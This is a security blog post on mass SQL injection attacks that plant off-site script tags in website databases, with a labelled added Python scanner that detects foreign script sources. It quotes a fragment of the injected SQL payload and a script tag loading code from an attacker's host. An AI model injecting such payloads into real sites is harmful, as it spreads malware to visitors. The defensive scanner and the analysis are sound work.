And the results are not graceful.
Attackers have been finding web sites with vulnerabilities that allow the content on the site to be modified. By far the most popular vulnerability is SQL Injection. Attackers inject a string like the following into a form field:
rtrim(convert(varchar(4000),['+@C+']))+”<script src=http://17gamo [dot] com/1.js></script>”’)FETCH NEXT FROM
<script src=http://17gamo [dot] com/1.js></script>
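A site owner can check whether stored content has already been modified this way. The following is an added example, not from the original post: it scans every text column of a database for script tags that load from hosts outside an allowlist. SQLite stands in for the site's real database, and the allowlist, the articles table and the evil.example host are constructed for illustration.

```python
import re
import sqlite3
from urllib.parse import urlparse

# Assumption: the only hosts this site legitimately loads scripts from.
ALLOWED_SCRIPT_HOSTS = {"www.example.com", "static.example.com"}
SCRIPT_SRC = re.compile(r"<script\b[^>]*?\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)

def foreign_scripts(text):
    """Return script src values in text whose host is not on the allowlist."""
    hits = []
    for src in SCRIPT_SRC.findall(text or ""):
        host = urlparse(src).hostname  # None for relative (same-site) paths
        if host and host not in ALLOWED_SCRIPT_HOSTS:
            hits.append(src)
    return hits

def scan_database(conn):
    """Scan every CHAR/TEXT column; return (table, column, rowid, src) tuples."""
    findings = []
    # Table and column names come from the catalog, not from user input.
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        columns = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')
                   if "CHAR" in r[2].upper() or "TEXT" in r[2].upper()]
        for column in columns:
            query = f'SELECT rowid, "{column}" FROM "{table}"'
            for rowid, value in conn.execute(query):
                findings += [(table, column, rowid, s) for s in foreign_scripts(value)]
    return findings

def build_sample_db():
    """Constructed sample: two fields carry an appended off-site script tag."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles "
                 "(id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT)")
    conn.executemany("INSERT INTO articles (title, body) VALUES (?, ?)", [
        ("Welcome", '<script src="https://static.example.com/app.js"></script>'),
        ("News<script src=http://evil.example/1.js></script>", "<p>Update</p>"),
        ("About", "<p>Us</p><script src=http://evil.example/1.js></script>"),
    ])
    return conn

if __name__ == "__main__":
    for finding in scan_database(build_sample_db()):
        print("off-site script:", finding)
```

A finding means the content was already altered; the underlying fix is still to remove the injection point by using parameterized queries in the vulnerable form handler.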
It Takes Two to Tango
This is an example of a vulnerability where it takes two to tango. Not only does it require a vulnerable client program connecting to untrusted data on the internet; to spread widely, it also requires vulnerable web applications that an attacker can use to host the malicious payload. I have also heard of ad servers downloading the malicious payload right along with banner ads for Fortune 500 companies. One of the big lessons here is that there is no “safe” area of the internet to browse.
Something that concerns me is that the organizations with the vulnerable web applications don’t know it or don’t care. They don’t have the brand damage of a large software company such as Microsoft, so thousands of small vulnerable web apps keep serving up the latest and greatest malicious payloads for the latest client vulnerabilities. If it isn’t Internet Explorer, like this week, it might be Firefox or Flash or a media plug-in.
Insecure web applications are helping the criminals win.
Written by: Chris Wysopal